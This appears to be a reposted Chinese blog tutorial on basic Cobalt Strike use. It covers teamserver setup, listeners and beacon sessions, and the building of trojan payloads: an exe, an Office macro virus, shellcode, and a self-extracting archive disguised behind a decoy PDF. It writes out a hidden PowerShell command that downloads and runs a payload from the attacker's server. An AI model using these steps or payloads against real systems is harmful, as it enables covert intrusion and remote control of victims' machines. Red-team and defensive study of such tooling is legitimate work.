cobalt strike基础使用

2023-12-13 06:16:04

coblat strike使用

服务搭建

首先将server端文件放进kali中

image-20231212193304738

对其赋权

image-20231212193638023

执行时需要root权限

设置ip

启动服务

./teamserver 10.4.7.138 123456

image-20231212194014237

回到win11启动cs,输入刚才配置的信息

image-20231212194210950

上线方式

木马(exe上线)

查看一下开放的端口

image-20231212195247967

添加监听

image-20231212195709609

再查看端口就发现一个新的监听端口

image-20231212195747671

新建木马

image-20231212195857878

image-20231212195929414

如果使用耳机添加过监听的话,选择choose就行了

执行一下木马,主机就上线了

image-20231212200311775

右键选择interact可以进入beacon会话

此时可以将sleep设为3

image-20231212200536161

直接用问号就可以看能使用的命令字

image-20231212200614616

也可以执行命令

shell whoami

image-20231212200912783

点击这个可以看到连接关系

image-20231212201144509

宏病毒

image-20231212202832048

输入个名字创建一下

image-20231212203110610

选择ms office

image-20231212203148817

生成之后选择复制

image-20231212203238342

内容粘贴进去

image-20231212203520457

生成的文件双击点击上线

image-20231212203926501

powershell

image-20231212205049332

同样选择监听对象然后生成

image-20231212205117277

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.4.7.138:80/a'))"

powershell中执行一下,主机上线

image-20231212205237569

shellcode

image-20231212205709035

仍然是选择监听对象然后生成

可以记事本打开看看

image-20231212205757425

这些数据格式其实就是硬编码加x

image-20231212210056630

可以使用加载器将这串编成exe格式

首先生成一个木马,然后贴进去一个pdf文件

image-20231212212828388

选中两个选择添加压缩文件

image-20231212212851615

勾选创建自解压文件

image-20231212212933306

image-20231212213845230

image-20231212213950585

image-20231212214010757

image-20231212214051266

image-20231212214947911

此处需要将光标放在fdp之前,插入完成后可以看到

image-20231212215020077

双击之后主机就会上线

image-20231212215119187

并且打开pdf文件

image-20231212215150510

插件

image-20231212215350209

image-20231212215401142

image-20231212215427653

重载后发现多了一个巨龙拉冬

image-20231212215515044

文章来源:https://blog.csdn.net/qq_58683895/article/details/134960167
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。